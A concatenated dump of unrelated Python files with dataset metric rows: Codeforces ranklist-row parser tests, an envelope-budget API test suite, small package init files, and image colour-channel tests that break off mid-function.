"party": {
"contestId": 374,
"members": [{"handle": "Deception"}],
"participantType": "CONTESTANT",
"ghost": False,
"room": 46,
"startTimeSeconds": 1387380600
},
"rank": 1,
"points": 4902.0,
"penalty": 0,
"successfulHackCount": 11,
"unsuccessfulHackCount": 1,
"problemResults": [
{
"points": 312.0,
"rejectedAttemptCount": 1,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4174
}, {
"points": 596.0,
"rejectedAttemptCount": 2,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4583
}, {
"points": 1128.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 3751
}, {
"points": 1816.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 1430
}, {
"points": 0.0,
"rejectedAttemptCount": 0,
"type": "FINAL"
}
],
"lastSubmissionTimeSeconds": 424242
}
self.row.load_from_dict(d)
self.assertEqual(Party(d['party']), self.row.party)
self.assertEqual(1, self.row.rank)
self.assertEqual(4902.0, self.row.points)
self.assertEqual(0, self.row.penalty)
self.assertEqual(11, self.row.successful_hack_count)
self.assertEqual(1, self.row.unsuccessful_hack_count)
self.assertEqual(list(map(ProblemResult, d['problemResults'])), self.row.problem_results)
self.assertEqual(424242, self.row.last_submission_time)
def load_only_required_from_dict(self):
"""
Required fields are:
party
rank
points
penalty
successfulHackCount
unsuccessfulHackCount
problemResults
"""
d = {
"party": {
"contestId": 374,
"members": [{"handle": "Deception"}],
"participantType": "CONTESTANT",
"ghost": False,
"room": 46,
"startTimeSeconds": 1387380600
},
"rank": 1,
"points": 4902.0,
"penalty": 0,
"successfulHackCount": 11,
"unsuccessfulHackCount": 1,
"problemResults": [
{
"points": 312.0,
"rejectedAttemptCount": 1,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4174
}, {
"points": 596.0,
"rejectedAttemptCount": 2,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4583
}, {
"points": 1128.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 3751
}, {
"points": 1816.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 1430
}, {
"points": 0.0,
"rejectedAttemptCount": 0,
"type": "FINAL"
}
]
}
self.row.load_from_dict(d)
self.assertEqual(Party(d['party']), self.row.party)
self.assertEqual(1, self.row.rank)
self.assertEqual(4902.0, self.row.points)
self.assertEqual(0, self.row.penalty)
self.assertEqual(11, self.row.successful_hack_count)
self.assertEqual(1, self.row.unsuccessful_hack_count)
self.assertEqual(list(map(ProblemResult, d['problemResults'])), self.row.problem_results)
self.assertIsNone(self.row.last_submission_time)
def test_load_from_json(self):
d = {
"party": {
"contestId": 374,
"members": [{"handle": "Deception"}],
"participantType": "CONTESTANT",
"ghost": False,
"room": 46,
"startTimeSeconds": 1387380600
},
"rank": 1,
"points": 4902.0,
"penalty": 0,
"successfulHackCount": 11,
"unsuccessfulHackCount": 1,
"problemResults": [
{
"points": 312.0,
"rejectedAttemptCount": 1,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4174
}, {
"points": 596.0,
"rejectedAttemptCount": 2,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4583
}, {
"points": 1128.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 3751
}, {
"points": 1816.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 1430
}, {
"points": 0.0,
"rejectedAttemptCount": 0,
"type": "FINAL"
}
],
"lastSubmissionTimeSeconds": 424242
}
json = str(d).replace('False', 'false').replace("'", '"')
self.row.load_from_json(json)
self.assertEqual(Party(d['party']), self.row.party)
self.assertEqual(1, self.row.rank)
self.assertEqual(4902.0, self.row.points)
self.assertEqual(0, self.row.penalty)
self.assertEqual(11, self.row.successful_hack_count)
self.assertEqual(1, self.row.unsuccessful_hack_count)
self.assertEqual(list(map(ProblemResult, d['problemResults'])), self.row.problem_results)
self.assertEqual(424242, self.row.last_submission_time)
def test_load_only_required_from_json(self):
"""
Required fields are:
party
rank
points
penalty
successfulHackCount
unsuccessfulHackCount
problemResults
"""
d = {
"party": {
"contestId": 374,
"members": [{"handle": "Deception"}],
"participantType": "CONTESTANT",
"ghost": False,
"room": 46,
"startTimeSeconds": 1387380600
},
"rank": 1,
"points": 4902.0,
"penalty": 0,
"successfulHackCount": 11,
"unsuccessfulHackCount": 1,
"problemResults": [
{
"points": 312.0,
"rejectedAttemptCount": 1,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4174
}, {
"points": 596.0,
"rejectedAttemptCount": 2,
"type": "FINAL",
"bestSubmissionTimeSeconds": 4583
}, {
"points": 1128.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 3751
}, {
"points": 1816.0,
"rejectedAttemptCount": 0,
"type": "FINAL",
"bestSubmissionTimeSeconds": 1430
}, {
"points": 0.0,
"rejectedAttemptCount": 0,
"type": "FINAL"
}
]
}
json = str(d).replace('False', 'false').replace("'", '"')
self.row.load_from_json(json)
self.assertEqual(Party(d['party']), self.row.party)
self.assertEqual(1, self.row.rank)
self.assertEqual(4902.0, self.row.points)
self.assertEqual(0, self.row.penalty)
self.assertEqual(11, self.row.successful_hack_count)
self.assertEqual(1, self.row.unsuccessful_hack_count)
self.assertEqual(list(map(ProblemResult, d['problemResults'])), self.row.problem_results)
self.assertIsNone(self.row.last_submission_time)
if __name__ == '__main__':
unittest.main()
| 33.604478
| 97
| 0.455474
| 645
| 9,006
| 6.269767
| 0.133333
| 0.064046
| 0.13452
| 0.077151
| 0.932987
| 0.932987
| 0.932987
| 0.932987
| 0.928289
| 0.928289
| 0
| 0.063677
| 0.428048
| 9,006
| 267
| 98
| 33.730337
| 0.721413
| 0.036087
| 0
| 0.86758
| 0
| 0
| 0.221491
| 0.062713
| 0
| 0
| 0
| 0
| 0.146119
| 1
| 0.022831
| false
| 0
| 0.009132
| 0
| 0.03653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9712768994f5a1edb806ab5f21f076b623ff8876
| 21,977
|
py
|
Python
|
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops-api
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | null | null | null |
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops-api
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | 10
|
2021-11-02T23:31:56.000Z
|
2021-12-07T03:41:12.000Z
|
tests/integration/test_envelope.py
|
andrew-chang-dewitt/hoops
|
3530c5127c35742aad84df8d6a5286b9f5ad3608
|
[
"MIT"
] | null | null | null |
"""Tests for /envelope routes."""
from decimal import Decimal
from unittest import main, IsolatedAsyncioTestCase as TestCase
from uuid import UUID
from db_wrapper.model import sql
# internal test dependencies
from tests.helpers.application import (
get_test_client,
get_token_header,
)
from tests.helpers.database import (
setup_user,
setup_account,
setup_transactions,
)
BASE_URL = "/envelope"
class TestRoutePostRoot(TestCase):
"""Testing POST /envelope."""
async def test_valid_request(self) -> None:
"""Testing a valid request's response."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database)
new_envelope = {
"name": "envelope",
}
response = await client.post(
BASE_URL,
headers={
**get_token_header(user_id),
"accept": "application/json"},
json=new_envelope)
with self.subTest(
msg="Responds with a status code of 201."):
self.assertEqual(201, response.status_code)
with self.subTest(
msg="Responds with newly created Envelope's data."):
body = response.json()
with self.subTest(msg="Saves the given name."):
self.assertEqual(body["name"], new_envelope["name"])
with self.subTest(msg="Bound to current user in auth token."):
self.assertEqual(body["user_id"], str(user_id))
with self.subTest(msg="Has a UUID identifier."):
self.assertTrue(UUID(body["id"]))
with self.subTest(msg="Starts with zero funds."):
self.assertEqual(body["total_funds"], 0)
with self.subTest(msg="Saves the Envelope to the database."):
body = response.json()
new_id = UUID(body["id"])
await database.connect()
query_result = await database.execute_and_return(sql.SQL("""
SELECT * FROM envelope
WHERE id = {new_id};
""").format(new_id=sql.Literal(new_id)))
await database.disconnect()
result = query_result[0]
with self.subTest(
msg="Given envelope name & database envelope name match."
):
self.assertEqual(result["name"], new_envelope["name"])
with self.subTest(msg="Binds to currently auth'd user."):
self.assertEqual(result["user_id"], user_id)
with self.subTest(msg="Starts with 0 funds."):
self.assertEqual(result["total_funds"], 0)
class TestRouteGetRoot(TestCase):
"""Testing GET /envelope."""
async def test_valid_request(self) -> None:
"""Testing a valid request's response."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
other_id = await setup_user(database, "other")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id}),
('envelope', 1.00, {user_id}),
('envelope', 1.00, {user_id}),
('envelope', 1.00, {other_id});
""").format(
user_id=sql.Literal(user_id),
other_id=sql.Literal(other_id))
await database.connect()
await database.execute(add_envelope_query)
await database.disconnect()
response = await client.get(
BASE_URL,
headers={
**get_token_header(user_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Responds w/ all Envelopes belonging to current user."
):
body = response.json()
self.assertEqual(
len(body), 3, msg="Body should contain 3 Envelopes.")
for item in body:
with self.subTest(msg="Envelope has a name."):
self.assertEqual(item["name"], "envelope")
with self.subTest(
msg="Bound to current user in auth token."):
self.assertEqual(item["user_id"], str(user_id))
with self.subTest(msg="Envelope has a UUID identifier."):
self.assertTrue(UUID(item["id"]))
with self.subTest(msg="Envelope has funds."):
self.assertEqual(item["total_funds"], 1.00)
class TestRouteGetId(TestCase):
"""Testing GET /envelope/{id}."""
async def test_valid_request(self) -> None:
"""Testing a valid request's response."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
response = await client.get(
f"{BASE_URL}/{envelope_id}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Responds with requested Envelope's data."):
body = response.json()
with self.subTest(msg="Includes the Envelope's name."):
self.assertEqual(body["name"], "envelope")
with self.subTest(msg="Bound to current user in auth token."):
self.assertEqual(body["user_id"], str(user_id))
with self.subTest(msg="Has a UUID identifier."):
self.assertEqual(body["id"], str(envelope_id))
with self.subTest(msg="Includes Envelope's funds."):
self.assertEqual(body["total_funds"], 1)
async def test_can_only_get_own_envelopes(self) -> None:
"""A User can't get another User's Envelopes."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
other_id = await setup_user(database, "other")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
response = await client.get(
f"{BASE_URL}/{envelope_id}",
headers={
**get_token_header(other_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 404."):
self.assertEqual(404, response.status_code)
class TestRoutePutId(TestCase):
"""Testing PUT /envelope/{id}."""
async def test_valid_request(self) -> None:
"""Testing a valid request's response."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
changes = {"name": "new name"}
response = await client.put(
f"{BASE_URL}/{envelope_id}",
headers={
**get_token_header(user_id),
"accept": "application/json"},
json=changes)
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Responds with requested Envelope's updated data."):
body = response.json()
with self.subTest(msg="Includes the Envelope's name."):
self.assertEqual(body["name"], changes["name"])
with self.subTest(msg="Saves changes to the database."):
body = response.json()
new_id = UUID(body["id"])
await database.connect()
query_result = await database.execute_and_return(sql.SQL("""
SELECT * FROM envelope
WHERE id = {new_id};
""").format(new_id=sql.Literal(new_id)))
await database.disconnect()
result = query_result[0]
self.assertEqual(result["name"], changes["name"])
async def test_can_only_change_own_envelopes(self) -> None:
"""A User can't change another User's Envelopes."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
other_id = await setup_user(database, "other")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
changes = {"name": "new name"}
response = await client.put(
f"{BASE_URL}/{envelope_id}",
headers={
**get_token_header(other_id),
"accept": "application/json"},
json=changes)
with self.subTest(
msg="Responds with a status code of 404."):
self.assertEqual(404, response.status_code)
async def test_can_not_update_funds(self) -> None:
"""Funds must be updated via `.../funds/{amount}` endpoint."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 1.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
changes = {"total_funds": 100000}
response = await client.put(
f"{BASE_URL}/{envelope_id}",
headers={
**get_token_header(user_id),
"accept": "application/json"},
json=changes)
with self.subTest(
msg="Responds with a status code of 404."):
self.assertEqual(422, response.status_code)
class TestRoutePutFunds(TestCase):
"""Testing PUT /envelope/{id}/funds/{amount}."""
async def test_move_funds_from_available(self) -> None:
"""Testing moving funds from Available Balance."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
account_id = await setup_account(database, user_id)
await setup_transactions(database, [Decimal(10)], account_id)
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 0.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
amount = 5
response = await client.put(
f"{BASE_URL}/{envelope_id}/funds/{amount}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Responds with Envelope with updated funds."):
body = response.json()
self.assertEqual(body["total_funds"], 5)
with self.subTest(
msg="Envelope is updated in database."):
query = sql.SQL("""
SELECT total_funds
FROM envelope
WHERE id = {envelope_id};
""").format(
envelope_id=sql.Literal(envelope_id))
await database.connect()
query_result = await database.execute_and_return(query)
await database.disconnect()
self.assertEqual(query_result[0]["total_funds"], 5)
with self.subTest(
msg="Can not move funds if not enough are available."):
amount = 11
response = await client.put(
f"{BASE_URL}/{envelope_id}/funds/{amount}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
self.assertEqual(response.status_code, 409)
async def test_move_funds_from_other_envelope(self) -> None:
"""Testing moving funds from a given Envelope."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
account_id = await setup_account(database, user_id)
await setup_transactions(database, [Decimal(10)], account_id)
add_envelopes_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('to', 0.00, {user_id}),
('from', 10.00, {user_id})
RETURNING
id, name;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelopes_query)
await database.disconnect()
for result in query_result:
if result["name"] == "from":
from_envelope = result["id"]
if result["name"] == "to":
to_envelope = result["id"]
amount = 5
response = await client.put(
f"{BASE_URL}/{to_envelope}/funds/{amount}" +
f"?other={from_envelope}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Source Envelope is updated in database."):
query = sql.SQL("""
SELECT total_funds
FROM envelope
WHERE id = {from_envelope};
""").format(
from_envelope=sql.Literal(from_envelope))
await database.connect()
query_result = await database.execute_and_return(query)
await database.disconnect()
self.assertEqual(query_result[0]["total_funds"], 5)
async def test_negative_funds_sends_from_envelope_to_other(self) -> None:
"""Moving negative funds takes from given envelope & gives to other."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
account_id = await setup_account(database, user_id)
await setup_transactions(database, [Decimal(10)], account_id)
add_envelopes_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 10.00, {user_id}),
('other', 0.00, {user_id})
RETURNING
id, name;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelopes_query)
await database.disconnect()
for result in query_result:
if result["name"] == "envelope":
envelope = result["id"]
if result["name"] == "other":
other = result["id"]
amount = -5
response = await client.put(
f"{BASE_URL}/{envelope}/funds/{amount}" +
f"?other={other}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
with self.subTest(
msg="Responds with a status code of 200."):
self.assertEqual(200, response.status_code)
with self.subTest(
msg="Source Envelope is updated in database."):
query = sql.SQL("""
SELECT total_funds
FROM envelope
WHERE id = {envelope};
""").format(
envelope=sql.Literal(envelope))
await database.connect()
query_result = await database.execute_and_return(query)
await database.disconnect()
self.assertEqual(query_result[0]["total_funds"], 5)
with self.subTest(
msg="Other Envelope is updated in database."):
query = sql.SQL("""
SELECT total_funds
FROM envelope
WHERE id = {other};
""").format(
other=sql.Literal(other))
await database.connect()
query_result = await database.execute_and_return(query)
await database.disconnect()
self.assertEqual(query_result[0]["total_funds"], 5)
async def test_can_not_move_funds_if_not_envough_available(self) -> None:
"""Can not move funds if not enough are available."""
async with get_test_client() as clients:
client, database = clients
user_id = await setup_user(database, "first")
account_id = await setup_account(database, user_id)
await setup_transactions(database, [Decimal(10)], account_id)
add_envelope_query = sql.SQL("""
INSERT INTO envelope
(name, total_funds, user_id)
VALUES
('envelope', 0.00, {user_id})
RETURNING
id;
""").format(
user_id=sql.Literal(user_id))
await database.connect()
query_result = \
await database.execute_and_return(add_envelope_query)
await database.disconnect()
envelope_id = query_result[0]["id"]
amount = 11
response = await client.put(
f"{BASE_URL}/{envelope_id}/funds/{amount}",
headers={
**get_token_header(user_id),
"accept": "application/json"})
self.assertEqual(response.status_code, 409)
if __name__ == "__main__":
main()
| 36.689482
| 79
| 0.5134
| 2,192
| 21,977
| 4.96031
| 0.073905
| 0.042491
| 0.052423
| 0.062908
| 0.849811
| 0.820841
| 0.790306
| 0.771176
| 0.757932
| 0.743493
| 0
| 0.011914
| 0.38513
| 21,977
| 598
| 80
| 36.750836
| 0.792718
| 0.009146
| 0
| 0.770065
| 0
| 0
| 0.258433
| 0.015757
| 0
| 0
| 0
| 0
| 0.075922
| 1
| 0
| false
| 0
| 0.013015
| 0
| 0.023861
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
977421f580ce1d3eff1f8f153407e47511353549
| 56
|
py
|
Python
|
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | null | null | null |
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | 19
|
2021-07-22T11:18:17.000Z
|
2021-08-20T10:12:17.000Z
|
models/NER/models/__init__.py
|
GroupLe/grouple-face-tagger
|
5fd87c074dc50a5fc341e9f30774094a1616a87f
|
[
"MIT"
] | 1
|
2021-07-29T11:56:03.000Z
|
2021-07-29T11:56:03.000Z
|
# from .naive import NerLstm
from .naive import BertLstm
| 28
| 28
| 0.803571
| 8
| 56
| 5.625
| 0.625
| 0.4
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 56
| 2
| 29
| 28
| 0.9375
| 0.464286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
979cf2d4987ad6d61141b5095063f9e1f3cc16bc
| 334
|
py
|
Python
|
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
torch_ort/__init__.py
|
ashari4/ort
|
4e1a654a23fe8f73d6702bb49694f7e793059989
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
from onnxruntime.training.ortmodule import ORTModule
from onnxruntime import set_seed
| 41.75
| 76
| 0.446108
| 23
| 334
| 6.434783
| 0.826087
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080838
| 334
| 7
| 77
| 47.714286
| 0.482085
| 0.712575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8ae690f5da4ecb026c964166afbb3290b5251e1e
| 166
|
py
|
Python
|
cloudcopy/server/setup.py
|
cloud-copy/server
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | null | null | null |
cloudcopy/server/setup.py
|
cloud-copy/server
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | 1
|
2020-09-25T02:24:45.000Z
|
2020-09-25T02:24:45.000Z
|
cloudcopy/server/setup.py
|
cloud-copy/core
|
1b4470adc3cfdadf7a5846667a4c905afa3ab1c3
|
[
"MIT"
] | null | null | null |
import os
from .config import settings
def setup_environment():
os.makedirs(settings.BASE_PATH, exist_ok=True)
os.makedirs(settings.LOG_PATH, exist_ok=True)
| 23.714286
| 50
| 0.777108
| 25
| 166
| 4.96
| 0.6
| 0.16129
| 0.290323
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126506
| 166
| 6
| 51
| 27.666667
| 0.855172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c139e327255d0b592b9ad110fc033a6fa4ed36f8
| 6,570
|
py
|
Python
|
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
test_image_manipulation.py
|
shequin-joshua-9147/cs162-final-project
|
0edff7170ca0761b38c30774475bfecac2a18f01
|
[
"MIT"
] | null | null | null |
"""
Pytest the ImageStuff module.
Joshua Shequin
"""
from image_manipulation import ImageO
import numpy as np
"""
BASE IMAGE
np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [255, 255, 255, 255]],
[[0, 0, 0, 255], [0, 0 ,0, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
[[255, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
[[247, 248, 255, 255], [255, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
"""
def test_clear_red():
io = ImageO("images/test_picture.png")
test_case = np.array([[[0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 255, 255], [0, 255, 255, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [0, 255, 255, 255], [0, 255, 255, 255]],
[[0, 255, 255, 255], [0, 0, 255, 255], [0, 255, 0, 255], [0, 0, 0, 255]],
[[0, 248, 255, 255], [0, 255, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.clear_red("", returnable=True) == test_case).all()
def test_clear_green():
io = ImageO("images/test_picture.png")
test_case = np.array([[[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [255, 0, 255, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 255, 255], [255, 0, 255, 255]],
[[255, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
[[247, 0, 255, 255], [255, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.clear_green("", returnable=True) == test_case).all()
def test_clear_blue():
io = ImageO("images/test_picture.png")
test_case = np.array([[[255, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [255, 255, 0, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [255, 255, 0, 255], [255, 255, 0, 255]],
[[255, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [255, 0, 0, 255]],
[[247, 248, 0, 255], [255, 255, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.clear_blue("", returnable=True) == test_case).all()
def test_only_red():
io = ImageO("images/test_picture.png")
test_case = np.array([[[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255], [255, 0, 0, 255]],
[[255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255], [255, 0, 0, 255]],
[[247, 0, 0, 255], [255, 0, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.red_only("", returnable=True) == test_case).all()
def test_only_green():
io = ImageO("images/test_picture.png")
test_case = np.array([[[0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [0, 255, 0, 255]],
[[0, 255, 0, 255], [0, 0, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255]],
[[0, 248, 0, 255], [0, 255, 0, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.green_only("", returnable=True) == test_case).all()
def test_only_blue():
io = ImageO("images/test_picture.png")
test_case = np.array([[[0, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [0, 0, 255, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [0, 0, 255, 255], [0, 0, 255, 255]],
[[0, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]],
[[0, 0, 255, 255], [0, 0, 255, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.blue_only("", returnable=True) == test_case).all()
def test_lower_half():
io = ImageO("images/test_picture.png")
test_case = np.array([[[127, 0, 0, 255], [0, 127, 0, 255], [0, 0, 127, 255], [127, 127, 127, 255]],
[[0, 0, 0, 255], [0, 0, 0, 255], [127, 127, 127, 255], [127, 127, 127, 255]],
[[127, 127, 127, 255], [0, 0, 127, 255], [0, 127, 0, 255], [127, 0, 0, 255]],
[[123, 124, 127, 255], [127, 127, 127, 255], [0, 0, 0, 255], [0, 0, 0, 255]]])
assert (io.lower_half("", returnable=True) == test_case).all()
def test_upper_half():
io = ImageO("images/test_picture.png")
test_case = np.array([[[255, 128, 128, 255], [128, 255, 128, 255], [128, 128, 255, 255], [255, 255, 255, 255]],
[[128, 128, 128, 255], [128, 128, 128, 255], [255, 255, 255, 255], [255, 255, 255, 255]],
[[255, 255, 255, 255], [128, 128, 255, 255], [128, 255, 128, 255], [255, 128, 128, 255]],
[[251, 252, 255, 255], [255, 255, 255, 255], [128, 128, 128, 255], [128, 128, 128, 255]]])
assert (io.upper_half("", returnable=True) == test_case).all()
def test_gray_scale():
io = ImageO("images/test_picture.png")
